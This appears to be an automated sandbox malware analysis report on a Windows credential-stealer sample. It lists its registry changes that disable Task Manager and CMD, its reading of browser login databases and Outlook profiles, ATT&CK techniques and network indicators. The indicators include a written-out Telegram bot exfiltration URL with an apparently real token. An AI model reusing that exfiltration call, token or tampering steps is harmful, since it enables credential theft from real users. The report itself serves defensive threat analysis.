            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 594999Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 594875Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 594766Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 594641Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 594531Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 594422Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 594313Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeThread delayed: delay time: 594188Jump to behavior
            Source: c7WJL1gt32.exe, 00000004.00000002.2954221736.00000000053E8000.00000004.00000020.00020000.00000000.sdmp, c7WJL1gt32.exe, 00000004.00000002.2954221736.0000000005449000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: c7WJL1gt32.exe, 00000004.00000002.2954221736.0000000005449000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWwg
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeAPI call chain: ExitProcess graph end nodegraph_0-4556
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeAPI call chain: ExitProcess graph end nodegraph_0-4714
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 0_2_00406943 GlobalFree,LdrInitializeThunk,GlobalAlloc,GlobalFree,LdrInitializeThunk,GlobalAlloc,0_2_00406943
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 0_2_6CF11B5F LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6CF11B5F
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeProcess created: C:\Users\user\Desktop\c7WJL1gt32.exe "C:\Users\user\Desktop\c7WJL1gt32.exe"Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeQueries volume information: C:\Users\user\Desktop\c7WJL1gt32.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeCode function: 0_2_004034A5 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_004034A5
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            barindex
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeRegistry value created: DisableTaskMgr 1Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeRegistry value created: DisableCMD 1Jump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgrJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000004.00000002.2978658417.0000000035B4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: c7WJL1gt32.exe PID: 7856, type: MEMORYSTR
            Source: Yara matchFile source: 00000004.00000002.2978658417.0000000035B4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: c7WJL1gt32.exe PID: 7856, type: MEMORYSTR
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\c7WJL1gt32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 00000004.00000002.2978658417.0000000035B4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: c7WJL1gt32.exe PID: 7856, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000004.00000002.2978658417.0000000035B4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: c7WJL1gt32.exe PID: 7856, type: MEMORYSTR
            Source: Yara matchFile source: 00000004.00000002.2978658417.0000000035B4A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: c7WJL1gt32.exe PID: 7856, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            DLL Side-Loading
            1
            Access Token Manipulation
            1
            Masquerading
            1
            OS Credential Dumping
            21
            Security Software Discovery
            Remote Services1
            Email Collection
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
            Process Injection
            31
            Disable or Modify Tools
            LSASS Memory31
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            31
            Virtualization/Sandbox Evasion
            Security Account Manager1
            Application Window Discovery
            SMB/Windows Admin Shares1
            Data from Local System
            1
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Access Token Manipulation
            NTDS1
            System Network Configuration Discovery
            Distributed Component Object Model1
            Clipboard Data
            3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Process Injection
            LSA Secrets2
            File and Directory Discovery
            SSHKeylogging14
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Deobfuscate/Decode Files or Information
            Cached Domain Credentials215
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
            Obfuscated Files or Information
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            c7WJL1gt32.exe78%VirustotalBrowse
            c7WJL1gt32.exe74%ReversingLabsWin32.Trojan.GuLoader
            c7WJL1gt32.exe100%AviraHEUR/AGEN.1337946
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nse90B2.tmp\System.dll0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            216.58.206.46
            truefalse
              high
              drive.usercontent.google.com
              142.250.185.129
              truefalse
                high
                reallyfreegeoip.org
                104.21.80.1
                truefalse
                  high
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    checkip.dyndns.com
                    132.226.8.169
                    truefalse
                      high
                      checkip.dyndns.org
                      unknown
                      unknownfalse
                        high
                        NameMaliciousAntivirus DetectionReputation
                        http://checkip.dyndns.org/false
                          high
                          https://reallyfreegeoip.org/xml/8.46.123.189false
                            high
                            https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189false
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://www.google.comc7WJL1gt32.exe, 00000004.00000003.2525192244.000000000545D000.00000004.00000020.00020000.00000000.sdmp, c7WJL1gt32.exe, 00000004.00000003.2525122829.000000000545D000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                http://checkip.dyndns.org/)c7WJL1gt32.exe, 00000004.00000002.2980225295.0000000038282000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://api.telegram.orgc7WJL1gt32.exe, 00000004.00000002.2978658417.0000000035C8A000.00000004.00000800.00020000.00000000.sdmp, c7WJL1gt32.exe, 00000004.00000002.2978658417.0000000035C24000.00000004.00000800.00020000.00000000.sdmp, c7WJL1gt32.exe, 00000004.00000002.2978658417.0000000035B4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://api.telegram.org/botc7WJL1gt32.exe, 00000004.00000002.2978658417.0000000035B4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382c7WJL1gt32.exe, 00000004.00000002.2978658417.0000000035B4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://translate.google.com/translate_a/element.jsc7WJL1gt32.exe, 00000004.00000003.2525192244.000000000545D000.00000004.00000020.00020000.00000000.sdmp, c7WJL1gt32.exe, 00000004.00000003.2525122829.000000000545D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          https://drive.google.com/c7WJL1gt32.exe, 00000004.00000002.2954221736.00000000053E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://reallyfreegeoip.orgc7WJL1gt32.exe, 00000004.00000002.2978658417.0000000035AB8000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://reallyfreegeoip.orgc7WJL1gt32.exe, 00000004.00000002.2978658417.0000000035AA0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://drive.usercontent.google.com/c7WJL1gt32.exe, 00000004.00000003.2559440809.000000000545D000.00000004.00000020.00020000.00000000.sdmp, c7WJL1gt32.exe, 00000004.00000002.2954221736.0000000005449000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://checkip.dyndns.orgc7WJL1gt32.exe, 00000004.00000002.2978658417.0000000035C8A000.00000004.00000800.00020000.00000000.sdmp, c7WJL1gt32.exe, 00000004.00000002.2978658417.0000000035C24000.00000004.00000800.00020000.00000000.sdmp, c7WJL1gt32.exe, 00000004.00000002.2978658417.0000000035B4A000.00000004.00000800.00020000.00000000.sdmp, c7WJL1gt32.exe, 00000004.00000002.2978658417.0000000035AA0000.00000004.00000800.00020000.00000000.sdmp, c7WJL1gt32.exe, 00000004.00000002.2978658417.0000000035A94000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://apis.google.comc7WJL1gt32.exe, 00000004.00000003.2525192244.000000000545D000.00000004.00000020.00020000.00000000.sdmp, c7WJL1gt32.exe, 00000004.00000003.2525122829.000000000545D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://checkip.dyndns.comc7WJL1gt32.exe, 00000004.00000002.2978658417.0000000035C8A000.00000004.00000800.00020000.00000000.sdmp, c7WJL1gt32.exe, 00000004.00000002.2978658417.0000000035C24000.00000004.00000800.00020000.00000000.sdmp, c7WJL1gt32.exe, 00000004.00000002.2978658417.0000000035AA0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://nsis.sf.net/NSIS_ErrorErrorc7WJL1gt32.exefalse
                                                          high
                                                          http://api.telegram.orgc7WJL1gt32.exe, 00000004.00000002.2978658417.0000000035C8A000.00000004.00000800.00020000.00000000.sdmp, c7WJL1gt32.exe, 00000004.00000002.2978658417.0000000035C24000.00000004.00000800.00020000.00000000.sdmp, c7WJL1gt32.exe, 00000004.00000002.2978658417.0000000035B4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namec7WJL1gt32.exe, 00000004.00000002.2978658417.0000000035A21000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://reallyfreegeoip.org/xml/c7WJL1gt32.exe, 00000004.00000002.2978658417.0000000035AA0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs
                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                132.226.8.169
                                                                checkip.dyndns.comUnited States
                                                                16989UTMEMUSfalse
                                                                149.154.167.220
                                                                api.telegram.orgUnited Kingdom
                                                                62041TELEGRAMRUfalse
                                                                142.250.185.129
                                                                drive.usercontent.google.comUnited States
                                                                15169GOOGLEUSfalse
                                                                104.21.80.1
                                                                reallyfreegeoip.orgUnited States
                                                                13335CLOUDFLARENETUSfalse
                                                                216.58.206.46
                                                                drive.google.comUnited States
                                                                15169GOOGLEUSfalse
                                                                Joe Sandbox version:42.0.0 Malachite
                                                                Analysis ID:1588956
                                                                Start date and time:2025-01-11 07:37:25 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 7m 20s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:6
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:c7WJL1gt32.exe
                                                                renamed because original name is a hash value
                                                                Original Sample Name:08972ea67ce0756e8af06aeea9628d2ec00392351f8aaaf69cde005f79d74051.exe
                                                                Detection:MAL
                                                                Classification:mal100.troj.spyw.evad.winEXE@3/8@5/5
                                                                EGA Information:
                                                                • Successful, ratio: 100%
                                                                HCA Information:
                                                                • Successful, ratio: 95%
                                                                • Number of executed functions: 152
                                                                • Number of non-executed functions: 110
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.45
                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                TimeTypeDescription
                                                                01:39:53API Interceptor252x Sleep call for process: c7WJL1gt32.exe modified
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                132.226.8.169MBOaS3GRtF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • checkip.dyndns.org/
                                                                fpIGwanLZi.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • checkip.dyndns.org/
                                                                4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                • checkip.dyndns.org/
                                                                uVpytXGpQz.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                • checkip.dyndns.org/
                                                                H75MnQEha8.exeGet hashmaliciousMassLogger RATBrowse
                                                                • checkip.dyndns.org/
                                                                7b4Iaf58Rp.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                • checkip.dyndns.org/
                                                                b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                • checkip.dyndns.org/
                                                                UF7jzc7ETP.exeGet hashmaliciousMassLogger RATBrowse
                                                                • checkip.dyndns.org/
                                                                V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                • checkip.dyndns.org/
                                                                FylY1FW6fl.exeGet hashmaliciousMassLogger RATBrowse
                                                                • checkip.dyndns.org/
                                                                149.154.167.220ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                  grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                    14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                      Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                        ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                          sS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                            lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                  n0nsAzvYNd.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    reallyfreegeoip.orgb6AGgIJ87g.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 104.21.80.1
                                                                                    ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 104.21.16.1
                                                                                    grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 104.21.96.1
                                                                                    14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 104.21.32.1
                                                                                    Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 104.21.64.1
                                                                                    ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 104.21.32.1
                                                                                    sS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 104.21.64.1
                                                                                    3qr7JBuNuX.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 104.21.16.1
                                                                                    lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 104.21.112.1
                                                                                    5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 104.21.112.1
                                                                                    api.telegram.orgZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 149.154.167.220
                                                                                    grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 149.154.167.220
                                                                                    14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 149.154.167.220
                                                                                    Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 149.154.167.220
                                                                                    ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    sS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 149.154.167.220
                                                                                    n0nsAzvYNd.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    checkip.dyndns.comb6AGgIJ87g.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 193.122.130.0
                                                                                    ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 193.122.6.168
                                                                                    grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 193.122.6.168
                                                                                    14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 132.226.247.73
                                                                                    Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 193.122.130.0
                                                                                    ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 193.122.6.168
                                                                                    sS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 158.101.44.242
                                                                                    3qr7JBuNuX.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 158.101.44.242
                                                                                    lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 158.101.44.242
                                                                                    5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 158.101.44.242
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    TELEGRAMRUZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 149.154.167.220
                                                                                    grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 149.154.167.220
                                                                                    14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 149.154.167.220
                                                                                    Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 149.154.167.220
                                                                                    ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    sS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    lkETeneRL3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    5qJ6QQTcRS.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 149.154.167.220
                                                                                    n0nsAzvYNd.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 149.154.167.220
                                                                                    CLOUDFLARENETUSb6AGgIJ87g.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 104.21.80.1
                                                                                    ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 104.21.16.1
                                                                                    grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 104.21.96.1
                                                                                    14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 104.21.32.1
                                                                                    Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 104.21.64.1
                                                                                    fqbVL4XxCr.exeGet hashmaliciousFormBookBrowse
                                                                                    • 104.21.112.1
                                                                                    JuIZye2xKX.exeGet hashmaliciousAgentTeslaBrowse
                                                                                    • 172.67.74.152
                                                                                    ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 104.21.32.1
                                                                                    962Zrwh5bU.exeGet hashmaliciousAzorultBrowse
                                                                                    • 104.21.75.48
                                                                                    sS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 104.21.64.1
                                                                                    UTMEMUS14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 132.226.247.73
                                                                                    rlPy5vt1Dg.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 132.226.247.73
                                                                                    wZ6VEnOkie.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 132.226.247.73
                                                                                    tNXl4XhgmV.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 132.226.247.73
                                                                                    MBOaS3GRtF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 132.226.8.169
                                                                                    fpIGwanLZi.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 132.226.8.169
                                                                                    4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 132.226.8.169
                                                                                    uVpytXGpQz.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 132.226.8.169
                                                                                    4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 132.226.247.73
                                                                                    TjoY7n65om.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 132.226.247.73
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    54328bd36c14bd82ddaa0c04b25ed9adb6AGgIJ87g.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                    • 104.21.80.1
                                                                                    ZaRP7yvL1J.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 104.21.80.1
                                                                                    grrezORe7h.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 104.21.80.1
                                                                                    14lVOjBoI2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 104.21.80.1
                                                                                    Qg79mitNvD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                    • 104.21.80.1
                                                                                    ty1nyFUMlo.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    • 104.21.80.1
                                                                                    sS7Jrsk0Z7.exeGet hashmaliciousDarkTortilla, Snake Keylogger, VIP KeyloggerBrowse
                                                                                    • 104.21.80.1
                                                                                    3qr7JBuNuX.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    • 104.21.80.1
